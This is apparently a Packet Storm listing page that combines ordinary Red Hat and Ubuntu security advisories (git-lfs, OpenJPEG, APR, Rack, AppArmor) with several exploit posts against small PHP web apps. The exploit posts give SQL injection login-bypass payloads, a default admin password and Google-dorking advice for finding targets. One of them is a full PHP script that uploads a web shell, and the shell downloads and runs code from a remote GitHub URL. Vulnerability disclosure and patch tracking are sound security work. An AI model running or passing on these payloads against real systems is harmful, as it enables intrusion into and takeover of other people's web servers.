Red Hat Security Advisory 2024-7136-03 - An update for git-lfs is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7136.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: git-lfs security updateAdvisory ID:        RHSA-2024:7136-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7136Issue date:         2024-09-26Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for git-lfs is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-7136-03

Ubuntu Security Notice 7037-1 - It was discovered that OpenJPEG could enter a large loop and continuously print warning messages when given specially crafted input. An attacker could potentially use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-7037-1  
September 26, 2024

openjpeg2 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

OpenJPEG could be made to crash if it opened a specially crafted file.

Software Description:  
- openjpeg2: JPEG 2000 image compression/decompression library

Details:

It was discovered that OpenJPEG could enter a large loop and continuously  
print warning messages when given specially crafted input. An attacker  
could potentially use this issue to cause a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  libopenjp2-7                    2.5.0-2ubuntu0.1  
  libopenjpip7                    2.5.0-2ubuntu0.1

Ubuntu 22.04 LTS  
  libopenjp2-7                    2.4.0-6ubuntu0.1  
  libopenjp3d7                    2.4.0-6ubuntu0.1  
  libopenjpip7                    2.4.0-6ubuntu0.1

Ubuntu 20.04 LTS  
  libopenjp2-7                    2.3.1-1ubuntu4.20.04.2  
  libopenjp3d7                    2.3.1-1ubuntu4.20.04.2  
  libopenjpip7                    2.3.1-1ubuntu4.20.04.2

Ubuntu 18.04 LTS  
  libopenjp2-7                    2.3.0-2+deb10u2ubuntu0.1~esm2  
                                  Available with Ubuntu Pro  
  libopenjp3d7                    2.3.0-2+deb10u2ubuntu0.1~esm2  
                                  Available with Ubuntu Pro  
  libopenjpip7                    2.3.0-2+deb10u2ubuntu0.1~esm2  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  libopenjp2-7                    2.1.2-1.1+deb9u6ubuntu0.1esm4  
                                  Available with Ubuntu Pro  
  libopenjp3d7                    2.1.2-1.1+deb9u6ubuntu0.1~esm4  
                                  Available with Ubuntu Pro  
  libopenjpip7                    2.1.2-1.1+deb9u6ubuntu0.1~esm4  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7037-1  
  CVE-2023-39327

Package Information:  
  https://launchpad.net/ubuntu/+source/openjpeg2/2.5.0-2ubuntu0.1  
  https://launchpad.net/ubuntu/+source/openjpeg2/2.4.0-6ubuntu0.1  
https://launchpad.net/ubuntu/+source/openjpeg2/2.3.1-1ubuntu4.20.04.2

Ubuntu Security Notice USN-7037-1

Red Hat Security Advisory 2024-7135-03 - An update for git-lfs is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7135.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: git-lfs security updateAdvisory ID:        RHSA-2024:7135-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7135Issue date:         2024-09-26Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for git-lfs is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-7135-03

Ubuntu Security Notice 7038-1 - Thomas Stangner discovered a permission vulnerability in the Apache Portable Runtime library. A local attacker could possibly use this issue to read named shared memory segments, potentially exposing sensitive application data.

==========================================================================  
Ubuntu Security Notice USN-7038-1  
September 26, 2024

apr vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

The system could be made to expose sensitive information.

Software Description:  
- apr: Apache Portable Runtime Library

Details:

Thomas Stangner discovered a permission vulnerability in the Apache  
Portable Runtime (APR) library. A local attacker could possibly use this  
issue to read named shared memory segments, potentially exposing sensitive  
application data.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  libapr1-dev                     1.7.2-3.1ubuntu0.1  
  libapr1t64                      1.7.2-3.1ubuntu0.1

Ubuntu 22.04 LTS  
  libapr1                         1.7.0-8ubuntu0.22.04.2  
  libapr1-dev                     1.7.0-8ubuntu0.22.04.2

Ubuntu 20.04 LTS  
  libapr1                         1.6.5-1ubuntu1.1  
  libapr1-dev                     1.6.5-1ubuntu1.1

Ubuntu 18.04 LTS  
  libapr1                         1.6.3-2ubuntu0.1~esm1  
                                  Available with Ubuntu Pro  
  libapr1-dev                     1.6.3-2ubuntu0.1~esm1  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  libapr1                         1.5.2-3ubuntu0.1~esm2  
                                  Available with Ubuntu Pro  
  libapr1-dev                     1.5.2-3ubuntu0.1~esm2  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7038-1  
  CVE-2023-49582

Package Information:  
  https://launchpad.net/ubuntu/+source/apr/1.7.2-3.1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/apr/1.7.0-8ubuntu0.22.04.2  
  https://launchpad.net/ubuntu/+source/apr/1.6.5-1ubuntu1.1

Ubuntu Security Notice USN-7038-1

Ubuntu Security Notice 7036-1 - It was discovered that Rack was not properly parsing data when processing multipart POST requests. If a user or automated system were tricked into sending a specially crafted multipart POST request to an application using Rack, a remote attacker could possibly use this issue to cause a denial of service. It was discovered that Rack was not properly escaping untrusted data when performing logging operations, which could cause shell escaped sequences to be written to a terminal. If a user or automated system were tricked into sending a specially crafted request to an application using Rack, a remote attacker could possibly use this issue to execute arbitrary code in the machine running the application.

    ==========================================================================Ubuntu Security Notice USN-7036-1September 26, 2024ruby-rack vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in Rack.Software Description:- ruby-rack: modular Ruby webserver interfaceDetails:It was discovered that Rack was not properly parsing data when processingmultipart POST requests. If a user or automated system were tricked intosending a specially crafted multipart POST request to an application usingRack, a remote attacker could possibly use this issue to cause a denial ofservice. (CVE-2022-30122)It was discovered that Rack was not properly escaping untrusted data whenperforming logging operations, which could cause shell escaped sequencesto be written to a terminal. If a user or automated system were trickedinto sending a specially crafted request to an application using Rack, aremote attacker could possibly use this issue to execute arbitrary code inthe machine running the application. (CVE-2022-30123)It was discovered that Rack did not properly structure regular expressionsin some of its parsing components, which could result in uncontrolledresource consumption if an application using Rack received speciallycrafted input. A remote attacker could possibly use this issue to cause adenial of service. (CVE-2022-44570, CVE-2022-44571)It was discovered that Rack did not properly structure regular expressionsin its multipart parsing component, which could result in uncontrolledresource consumption if an application using Rack to parse multipart postsreceived specially crafted input. A remote attacker could possibly usethis issue to cause a denial of service. (CVE-2022-44572)It was discovered that Rack incorrectly handled Multipart MIME parsing.A remote attacker could possibly use this issue to cause Rack to consumeresources, leading to a denial of service. (CVE-2023-27530)It was discovered that Rack incorrectly handled certain regularexpressions. A remote attacker could possibly use this issue to causeRack to consume resources, leading to a denial of service.(CVE-2023-27539)It was discovered that Rack incorrectly parsed certain media types. Aremote attacker could possibly use this issue to cause Rack to consumeresources, leading to a denial of service. (CVE-2024-25126)It was discovered that Rack incorrectly handled certain Range headers. Aremote attacker could possibly use this issue to cause Rack to createlarge responses, leading to a denial of service. (CVE-2024-26141)It was discovered that Rack incorrectly handled certain crafted headers. Aremote attacker could possibly use this issue to cause Rack to consumeresources, leading to a denial of service. (CVE-2024-26146)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  ruby-rack                       2.1.4-5ubuntu1.1After a standard system update you need to restart any applications usingRack to make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7036-1  CVE-2022-30122, CVE-2022-30123, CVE-2022-44570, CVE-2022-44571,  CVE-2022-44572, CVE-2023-27530, CVE-2023-27539, CVE-2024-25126,  CVE-2024-26141, CVE-2024-26146, https://bugs.launchpad.net/ubuntu/+source/ruby-rack/+bug/2078711Package Information:  https://launchpad.net/ubuntu/+source/ruby-rack/2.1.4-5ubuntu1.1

Ubuntu Security Notice USN-7036-1

Ubuntu Security Notice 7035-1 - It was discovered that the AppArmor policy compiler incorrectly generated looser restrictions than expected for rules allowing mount operations. A local attacker could possibly use this to bypass AppArmor restrictions in applications where some mount operations were permitted.

==========================================================================  
Ubuntu Security Notice USN-7035-1  
September 25, 2024

apparmor vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

AppArmor restrictions could be bypassed for rules allowing mount  
operations

Software Description:  
- apparmor: Linux security system

Details:

It was discovered that the AppArmor policy compiler incorrectly generated  
looser restrictions than expected for rules allowing mount operations. A  
local attacker could possibly use this to bypass AppArmor restrictions in  
applications where some mount operations were permitted.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  apparmor                        3.0.4-2ubuntu2.4

Ubuntu 20.04 LTS  
  apparmor                        2.13.3-7ubuntu5.4

In general, a standard system update will make all the necessary changes.  
After this update, applications confined by policies with mount operations  
restrictions may need to have the rules updated.

References:  
  https://ubuntu.com/security/notices/USN-7035-1  
  https://bugs.launchpad.net/apparmor/+bug/1597017  
  CVE-2016-1585

Package Information:  
  https://launchpad.net/ubuntu/+source/apparmor/3.0.4-2ubuntu2.4  
  https://launchpad.net/ubuntu/+source/apparmor/2.13.3-7ubuntu5.4

Ubuntu Security Notice USN-7035-1

SchoolPlus version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : SchoolPlus v1.0 Auth By Pass Vulnerability                                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

SchoolPlus 1.0 SQL Injection

School Log Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : School Log Management System 1.0 code injection Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 28    Line 37  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',    'contact' => '00213771818860',    'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/slms/admin/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/slms/admin/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

School Log Management System 1.0 Code Injection

School Dormitory Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : School Dormitory Management System v1.0 Insecure Settings Vulnerability                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/user/257130/activity                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yoruanwitness000webhostappcom/admin/?page=clientsGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

School Dormitory Management System 1.0 Insecure Settings

Sample Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**Sample Blog Site 1.0 SQL Injection**

**Sample Blog Site 1.0 SQL Injection**

Posted Sep 26, 2024

Authored by indoushka

Sample Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection, bypass

SHA-256 | ff00fa017d6b2c496a8bf995f9b728c45edba03e76532f4e55d8dac49f2ca066

Download | Favorite | View

**Sample Blog Site 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : Sample Blog Site 1.0 auth by pass Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-simple-ims.zip                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : ' or 0=0 ##[+] http://127.0.0.1/blog/admin/index.php?page=homeGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Source

Packet Storm